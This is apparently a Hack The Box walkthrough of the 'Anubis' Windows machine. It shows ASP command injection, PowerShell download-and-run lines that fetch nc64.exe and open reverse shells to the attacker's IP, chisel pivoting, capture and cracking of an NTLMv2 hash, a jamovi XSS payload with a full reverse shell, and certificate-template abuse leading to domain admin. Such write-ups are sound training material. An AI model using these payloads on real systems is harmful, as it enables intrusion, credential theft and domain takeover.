Summary

  • RCE in the Web application
  • Pivoting
  • Network analysis
  • Custom Exploitation
  • Domain Admin by Abusing Certifcate service

Scanning

┌─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $nmap -Pn -sC -sV 10.10.11.102 -oN allports.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 08:23 CET
Nmap scan report for www.windcorp.htb (10.10.11.102)
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-02-23T08:40:00+00:00; +1h14m55s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Windcorp – Index
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Not valid before: 2021-05-24T19:44:56
|_Not valid after: 2031-05-24T19:54:56
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-02-23T08:39:24
|_ start_date: N/A
|_clock-skew: mean: 1h14m56s, deviation: 2s, median: 1h14m54sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.27 seconds
┌─[puck@parrot-lt]─[~/htb/anubis]


Lets add windorp.htb to /etc/hosts and check the web application.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $echo "10.10.11.102 www.windcorp.htb" | sudo tee --append /etc/hosts
10.10.11.102 www.windcorp.htb

Pasted-image-20220128144716 The application is static, there is only from that looks interesting.

Pasted-image-20220128144924

I will use burpsuite to analyze the request.

GET /save.asp?name=puck&email=puck%40home.nl&subject=hoi&message=hoihoi HTTP/1.1
Host: www.windcorp.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://www.windcorp.htb/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

User input goes to save.asp file, Can we get a remote code execution ?.

Lets check !

Pasted-image-20220128150137

I injected the message parameter with .net code to ping me, Now i will start tcpdump to listen to ICMP.

 └─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 

BINGO !

other way is to use

<%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("whoami")
Response.Write(proc.StdOut.ReadAll)
%>

This gives as result in burp

<b>Subject: </b></td><td>areyouthere</td></tr><tr><td>
<b>Message: </b></td><td>nt authority\system
</td>

The code worked and i received the ICMP requests.

 └─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:08:02.641660 IP www.windcorp.htb > 10.10.14.2: ICMP echo request, id 1000, seq 2765, length 40
11:08:02.641680 IP 10.10.14.2 > www.windcorp.htb: ICMP echo reply, id 1000, seq 2765, length 40

Foothold

We could use generating the reverse shell using revshells

i used below PAYLOAD

 <%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("powershell -c curl -outfile C:\nc64.exe http://10.10.14.2/nc64.exe; C:\nc64.exe -e powershell 10.10.14.2 443")
Response.Write(proc.StdOut.ReadAll)
%>
 

I need now to listen on port 443 using netcat., and get my reverse shell.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $sudo nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.102] 49920
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\windows\system32\inetsrv> whoami
whoami
nt authority\systemPS C:\windows\system32\inetsrv> hostname
hostname
webserver01
PS C:\windows\system32\inetsrv> ipconfig
ipconfigWindows IP Configuration

Ethernet adapter vEthernet (Ethernet):

Connection-specific DNS Suffix . : htb
Link-local IPv6 Address . . . . . : fe80::c70:4d6e:2607:b2ee%32
IPv4 Address. . . . . . . . . . . : 172.18.223.176
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 172.18.208.1
PS C:\windows\system32\inetsrv>


Hmm?, system ! I don’t think it’s easy like that

PS C:\Users> ls 


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-----         4/9/2021  10:36 PM                Administrator                                    
d-----        5/25/2021  12:05 PM                ContainerAdministrator                           
d-----         4/9/2021  10:37 PM                ContainerUser                                    
d-r---         4/9/2021  10:36 PM                Public  

It’s a container.

 

Enumeration

Lets see what the Administrator have on desktop.

 PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
-a----        5/24/2021   9:36 PM            989 req.txt                                          


PS C:\Users\Administrator\Desktop> type req.txt
-----BEGIN CERTIFICATE REQUEST-----
MIICoDCCAYgCAQAwWzELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ETAPBgNVBAoMCFdpbmRDb3JwMSQwIgYDVQQDDBtzb2Z0d2FyZXBvcnRhbC53aW5k
Y29ycC5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCmm0r/hZHC
KsK/BD7OFdL2I9vF8oIeahMS9Lb9sTJEFCTHGxCdhRX+xtisRBvAAFEOuPUUBWKb
BEHIH2bhGEfCenhILl/9RRCuAKL0iuj2nQKrHQ1DzDEVuIkZnTakj3A+AhvTPntL
eEgNf5l33cbOcHIFm3C92/cf2IvjHhaJWb+4a/6PgTlcxBMne5OsR+4hc4YIhLnz
QMoVUqy7wI3VZ2tjSh6SiiPU4+Vg/nvx//YNyEas3mjA/DSZiczsqDvCNM24YZOq
qmVIxlmQCAK4Wso7HMwhaKlue3cu3PpFOv+IJ9alsNWt8xdTtVEipCZwWRPFvGFu
1x55Svs41Kd3AgMBAAGgADANBgkqhkiG9w0BAQsFAAOCAQEAa6x1wRGXcDBiTA+H
JzMHljabY5FyyToLUDAJI17zJLxGgVFUeVxdYe0br9L91is7muhQ8S9s2Ky1iy2P
WW5jit7McPZ68NrmbYwlvNWsF7pcZ7LYVG24V57sIdF/MzoR3DpqO5T/Dm9gNyOt
yKQnmhMIo41l1f2cfFfcqMjpXcwaHix7bClxVobWoll5v2+4XwTPaaNFhtby8A1F
F09NDSp8Z8JMyVGRx2FvGrJ39vIrjlMMKFj6M3GAmdvH+IO/D5B6JCEE3amuxU04
CIHwCI5C04T2KaCN4U6112PDIS0tOuZBj8gdYIsgBYsFDeDtp23g4JsR6SosEiso
4TlwpQ==
-----END CERTIFICATE REQUEST-----

It’s SSL certifacte, lets decode it.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $openssl req -in req.txt -noout -text
Certificate Request:
    Data:
        Version: 1 (0x0)
        Subject: C = AU, ST = Some-State, O = WindCorp, CN = softwareportal.windcorp.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:a6:9b:4a:ff:85:91:c2:2a:c2:bf:04:3e:ce:15:
                    d2:f6:23:db:c5:f2:82:1e:6a:13:12:f4:b6:fd:b1:
                    32:44:14:24:c7:1b:10:9d:85:15:fe:c6:d8:ac:44:
                    1b:c0:00:51:0e:b8:f5:14:05:62:9b:04:41:c8:1f:
                    66:e1:18:47:c2:7a:78:48:2e:5f:fd:45:10:ae:00:
                    a2:f4:8a:e8:f6:9d:02:ab:1d:0d:43:cc:31:15:b8:
                    89:19:9d:36:a4:8f:70:3e:02:1b:d3:3e:7b:4b:78:
                    48:0d:7f:99:77:dd:c6:ce:70:72:05:9b:70:bd:db:
                    f7:1f:d8:8b:e3:1e:16:89:59:bf:b8:6b:fe:8f:81:
                    39:5c:c4:13:27:7b:93:ac:47:ee:21:73:86:08:84:
                    b9:f3:40:ca:15:52:ac:bb:c0:8d:d5:67:6b:63:4a:
                    1e:92:8a:23:d4:e3:e5:60:fe:7b:f1:ff:f6:0d:c8:
                    46:ac:de:68:c0:fc:34:99:89:cc:ec:a8:3b:c2:34:
                    cd:b8:61:93:aa:aa:65:48:c6:59:90:08:02:b8:5a:
                    ca:3b:1c:cc:21:68:a9:6e:7b:77:2e:dc:fa:45:3a:
                    ff:88:27:d6:a5:b0:d5:ad:f3:17:53:b5:51:22:a4:
                    26:70:59:13:c5:bc:61:6e:d7:1e:79:4a:fb:38:d4:
                    a7:77
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: sha256WithRSAEncryption
         6b:ac:75:c1:11:97:70:30:62:4c:0f:87:27:33:07:96:36:9b:
         63:91:72:c9:3a:0b:50:30:09:23:5e:f3:24:bc:46:81:51:54:
         79:5c:5d:61:ed:1b:af:d2:fd:d6:2b:3b:9a:e8:50:f1:2f:6c:
         d8:ac:b5:8b:2d:8f:59:6e:63:8a:de:cc:70:f6:7a:f0:da:e6:
         6d:8c:25:bc:d5:ac:17:ba:5c:67:b2:d8:54:6d:b8:57:9e:ec:
         21:d1:7f:33:3a:11:dc:3a:6a:3b:94:ff:0e:6f:60:37:23:ad:
         c8:a4:27:9a:13:08:a3:8d:65:d5:fd:9c:7c:57:dc:a8:c8:e9:
         5d:cc:1a:1e:2c:7b:6c:29:71:56:86:d6:a2:59:79:bf:6f:b8:
         5f:04:cf:69:a3:45:86:d6:f2:f0:0d:45:17:4f:4d:0d:2a:7c:
         67:c2:4c:c9:51:91:c7:61:6f:1a:b2:77:f6:f2:2b:8e:53:0c:
         28:58:fa:33:71:80:99:db:c7:f8:83:bf:0f:90:7a:24:21:04:
         dd:a9:ae:c5:4d:38:08:81:f0:08:8e:42:d3:84:f6:29:a0:8d:
         e1:4e:b5:d7:63:c3:21:2d:2d:3a:e6:41:8f:c8:1d:60:8b:20:
         05:8b:05:0d:e0:ed:a7:6d:e0:e0:9b:11:e9:2a:2c:12:2b:28:
         e1:39:70:a5
┌─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $

There is another subdomain, I added it to /etc/hosts but i couldn’t reach it

I need to establish a tunnel to port forward the machines ports to see be able to open the internal web application.

Port forwarding

If you are struggling downloading chisel to the machine you can use this command :

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/chisel.exe','C:\users\Administrator\Desktop\chisel.exe')

Victim Machine

PS C:\users\administrator\desktop> .\chisel.exe client 10.10.14.2:8000 R:socks

.\chisel.exe client 10.10.14.2:1337 R:127.0.0.1:socks
2022/02/25 14:22:46 client: Connecting to ws://10.10.14.2:1337
2022/02/25 14:22:48 client: Connected (Latency 147.5104ms)

Attacker Machine

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $./chisel server -p 1337 –reverse
2022/02/25 13:08:06 server: Reverse tunnelling enabled
2022/02/25 13:08:06 server: Fingerprint 2xJ5k3GohfxUHC9nrh2ELWq1sXfkn2yhUtQ2/eVwqqs=
2022/02/25 13:08:06 server: Listening on http://0.0.0.0:1337
2022/02/25 13:08:32 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening


.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $sudo proxychains crackmapexec smb 172.18.208.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
SMB 172.18.208.1 445 EARTH [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
┌─[puck@parrot-lt]─[~/htb/anubis]

 

Now we need too add softwareportal.windcorp.htb to our /etc/hosts and setup the socks as our proxy in the browser.

172.18.208.1 softwareportal.windcorp.htb

that's the container default gateway

Pasted-image-20220128164425

The web application is getting the programs from internal ip, lets see what is happening.

Pasted-image-20220128164647

Lateral Movement

Lets analyze the request by changing the client to our ip and setup a listener using TCPDUMP to see what is happening.

Victim Machine

PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"

Attacker Machine

└─$ sudo tcpdump -i tun0 -w logs.pcap -n        
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

Lets grep the logs and start the analysis.

tcpdump -r logs.pcap | grep -v '5554' | head reading from file logs.pcap, link-type RAW (Raw IP), snapshot length 262144 20:47:56.626363 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [SEW], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:56.626424 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 4024374085, win 0, length 0 20:47:57.373410 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:57.373457 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0 20:47:58.089647 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:58.089682 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0 20:47:58.249260 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [SEW], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:58.249305 IP 10.10.14.79.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 2900609791, win 0, length 0 20:47:59.012439 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [S], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:59.012486 IP 10.10.17.76.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 1, win 0, length 0

That didn’t work for me from the 1st time, don’t give up on it, keep trying.

From that logs i understood that the web application trying to authenticate from WinRM to get the file.

Escaping the docker

I will start the responder to catch the hash of the user that trying to authenticate against WinRM.

sudo responder -I tun0 -v

Lets repeat the request and see what will happen.

PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"

BAM !

[+] Listening for events... [WinRM] NTLMv2 Client : 10.10.11.102 [WinRM] NTLMv2 Username : windcorp\localadmin [WinRM] NTLMv2 Hash : localadmin::windcorp:5154b10fe742e26f:02D37AB30D2443EEFC13F18062985D6E:0101000000000000B574CFFAD2CDD7012A9D75CCC99D4C0D0000000002000800490053003700540001001E00570049004E002D00520031005800530059005400560035003700450034000400140049005300370054002E004C004F00430041004C0003003400570049004E002D00520031005800530059005400560035003700450034002E0049005300370054002E004C004F00430041004C000500140049005300370054002E004C004F00430041004C0008003000300000000000000000000000002100008840E4FBD0AA6E1880E61526E42DF0210E6BE2F694B85FED945A976C305BDE030A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00370039000000000000000000

 

Lets crack it.

hashcat -m 5600 hash_localadmin /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
------------SNIP------------

LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d2443eefc13f18062985d6e:0101000000000000b574cffad2cdd7012a9d75ccc99d4c0d0000000002000800490053003700540001001e00570049004e002d00520031005800530059005400560035003700450034000400140049005300370054002e004c004f00430041004c0003003400570049004e002d00520031005800530059005400560035003700450034002e0049005300370054002e004c004f00430041004c000500140049005300370054002e004c004f00430041004c0008003000300000000000000000000000002100008840e4fbd0aa6e1880e61526e42df0210e6be2f694b85fed945a976c305bde030a001000000000000000000000000000000000000900200048005400540050002f00310030002e00310030002e00310034002e00370039000000000000000000:Secret123

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d244...000000
Time.Started.....: Sat Oct 30 21:17:32 2021 (3 secs)
Time.Estimated...: Sat Oct 30 21:17:35 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 713.3 kH/s (2.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2093056/14344385 (14.59%)
Rejected.........: 0/2093056 (0.00%)
Restore.Point....: 2091008/14344385 (14.58%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Smudge4 -> SaTeLlItE
Started: Sat Oct 30 21:17:30 2021
Stopped: Sat Oct 30 21:17:37 2021
------------SNIP------------

User

Lets enumerate SMB.

smbclient -L //10.10.11.102 -U localadmin
Enter WORKGROUP\localadmin's password:Secret123
 Sharename Type Comment
 --------- ---- -------
	 ADMIN$     Disk Remote Admin
	 C$         Disk  Default share
	 CertEnroll Disk Active Directory Certificate Services share
	 IPC$       IPC Remote IPC
	 NETLOGON   Disk Logon server share
	 Shared     Disk
	 SYSVOL 	Disk Logon server share

> smbclient //10.10.11.102/Shared -U localadmin
Enter WORKGROUP\localadmin's password:Secret123
Try "help" to get a list of possible commands.
smb: \> ls
.         D 0 Wed Apr 28 15:06:06 2021
..        D 0 Wed Apr 28 15:06:06 2021
Documents D 0 Tue Apr 27 04:09:25 2021
Software  D 0 Thu Jul 22 18:14:16 2021

		9034239 blocks of size 4096. 3206077 blocks available

smb: \> ls Software\
 .          				     D 0 Thu Jul 22 18:14:16 2021
 ..             				 D 0 Thu Jul 22 18:14:16 2021
 7z1900-x64.exe                  N 1447178 Mon Apr 26 21:10:08 2021
 jamovi-1.6.16.0-win64.exe 		 N 247215343 Mon Apr 26 21:03:30 2021
 VNC-Viewer-6.20.529-Windows.exe N 10559784 Mon Apr 26 21:09:53 2021
 
 		9034239 blocks of size 4096. 3206077 blocks available

smb: \> ls Documents\Analytics\
 . 			      D 0 Tue Apr 27 18:40:20 2021
 .. 			  D 0 Tue Apr 27 18:40:20 2021
 Big 5.omv  	  A 6455 Tue Apr 27 18:39:20 2021
 Bugs.omv   	  A 2897 Tue Apr 27 18:39:55 2021
 Tooth Growth.omv A 2142 Tue Apr 27 18:40:20 2021
 Whatif.omv       A 2841 Sat Oct 30 21:49:42 2021
 
 	9034239 blocks of size 4096. 3206077 blocks available

What is .omv, Lets search.

Pasted-image-20220128175408

I searched for jamovi latest vulnerabilities and i found this CVE-2021-28079

I need to make .OMV file and inject XSS payload to get a reverse shell.

note : Don’t exhaust yourself trying to find that vuln version download it from the share.

Lets unzip Whatif.omv.

 └─# unzip Whatif.omv       
  Archive:  Whatif.omv
  inflating: META-INF/MANIFEST.MF    
  inflating: index.html              
  inflating: metadata.json           
  inflating: xdata.json              
  inflating: data.bin                
  inflating: 01 empty/analysis  
  

I injected the name column as described in the previous link.

Pasted-image-20220128181500

(() => {
    let sh = require('child_process');
	 sh.exec("powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.17.76',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
    return /a/;
})();

That is the reverse shell i used make sure you save it as .js file, Now replace the file we made with the one on the server using SMB.

┌─[puck@parrot-lt]─[~/htb/anubis/omv]
└──╼ $smbclient //10.10.11.102/Shared -U windcorp.htb/localadmin Secret123
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 28 17:06:06 2021
.. D 0 Wed Apr 28 17:06:06 2021
Documents D 0 Tue Apr 27 06:09:25 2021
Software D 0 Thu Jul 22 20:14:16 2021

9034239 blocks of size 4096. 3242014 blocks available
smb: \> cd Documents
smb: \Documents\> ls
. D 0 Tue Apr 27 06:09:25 2021
.. D 0 Tue Apr 27 06:09:25 2021
Analytics D 0 Tue Apr 27 20:40:20 2021

9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\> cd Analytics
smb: \Documents\Analytics\> ls
. D 0 Tue Apr 27 20:40:20 2021
.. D 0 Tue Apr 27 20:40:20 2021
Big 5.omv A 6455 Tue Apr 27 20:39:20 2021
Bugs.omv A 2897 Tue Apr 27 20:39:55 2021
Tooth Growth.omv A 2142 Tue Apr 27 20:40:20 2021
Whatif.omv A 2841 Thu Feb 24 13:00:07 2022

9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\Analytics\> put Whatif.omv
putting file Whatif.omv as \Documents\Analytics\Whatif.omv (11.1 kb/s) (average 11.1 kb/s)
smb: \Documents\Analytics\>

smb: \Documents\Analytics\> 
smb: \Documents\Analytics\> put Whatif.omv
putting file Whatif.omv as \Documents\Analytics\Whatif.omv (2.0 kb/s) (average 2.0 kb/s)

start you Http server to deliver the file and use netcat to get the reverseshell.

PS C:\users\diegocruz> cd Desktop
PS C:\users\diegocruz\Desktop> type user.txt
8a298cdf7dc52a52a607b9f3912966ff

 

ROOT

If you noticed CertEnroll share when we used SMBclient, that folder used by Active Directory Certificate Services for certificate enrollment.

now lets use certutil -template to see what template we have permission to issue.

 PS> certutil -template

  Template[31]:
  TemplatePropCommonName = Web
  TemplatePropFriendlyName = Web
  TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3510634497-171945951-3071966075-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-3290)(A;;LCRPLORC;;;AU)

    Allow Enroll        WINDCORP\Domain Admins
    Allow Enroll        WINDCORP\Enterprise Admins
    Allow Full Control  WINDCORP\Domain Admins
    Allow Full Control  WINDCORP\Enterprise Admins
    Allow Full Control  WINDCORP\Administrator
    Allow Full Control  WINDCORP\webdevelopers
    Allow Read  NT AUTHORITY\Authenticated Users



USER INFORMATION
----------------

User Name          SID                                          
================== =============================================
windcorp\diegocruz S-1-5-21-3510634497-171945951-3071966075-3245


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
WINDCORP\webdevelopers                     Group            S-1-5-21-3510634497-171945951-3071966075-3290 Mandatory group, Enabled by default, Enabled group



The user we have is a member of webdevelopers group, So we can issue the certificate using WEB template.

After some searching i found a detailed article for this attack Certified-Pre-Owned

We need to get Certify.exe to start out attack, You can find it here CompiledBinaires

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/certify.exe','C:\users\diegocruz\Desktop\certify.exe')
PS C:\Users\diegocruz\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/rubeus.exe','C:\users\diegocruz\Desktop\rubeus.exe')
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/rubeus.exe','C:\users\diegocruz\Desktop\rubeus.exe')
PS C:\Users\diegocruz\Desktop> 

PS C:\Users\diegocruz\Desktop> .\certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.0.0                               

[*] Action: Request a Certificates

[*] Current user context    : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.

[*] Template                : Web
[*] Subject                 : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : earth.windcorp.htb\windcorp-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 3

[*] cert.pem         :


Now copy the certificate from the victim machine and paste it to a file called cert.pem in your machine, Now convert it using openssl.

└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(root💀kali)-[/home/kali/HTB/anubis]
└─# ls     
cert.pem  cert.pfx  

Lets get our TGT.

.\rubeus.exe asktgt /user:Administrator /certificate:C:\users\diegocruz\desktop\cert.pfx

Pasted-image-20220128194724

Export it to KRB :

Pasted-image-20220128194757

Pasted-image-20220128194757

DONE

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $python3 psexec.py -hashes 3CCC18280610C6CA3156F995B5899E09:3CCC18280610C6CA3156F995B5899E09 administrator@10.10.11.102 cmd.exe
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.11.102.....
[*] Found writable share ADMIN$
[*] Uploading file cmOtbeVS.exe
[*] Opening SVCManager on 10.10.11.102.....
[*] Creating service zMsf on 10.10.11.102.....
[*] Starting service zMsf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 77EB-C165

Directory of c:\Users\Administrator\Desktop

08/11/2021 12:54 PM <DIR> .
08/11/2021 12:54 PM <DIR> ..
02/24/2022 11:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 13,199,126,528 bytes free

c:\Users\Administrator\Desktop>type root.txt
38e[redacted]de3f

c:\Users\Administrator\Desktop>

references used :

Impersonating a Windows Enterprise Admin with a Certificate: Kerberos PKINIT from Linux

https://hackso.me/anubis-htb-walkthrough/

https://m19o.github.io/posts/Hackthebox-Anubis-Walkthrough/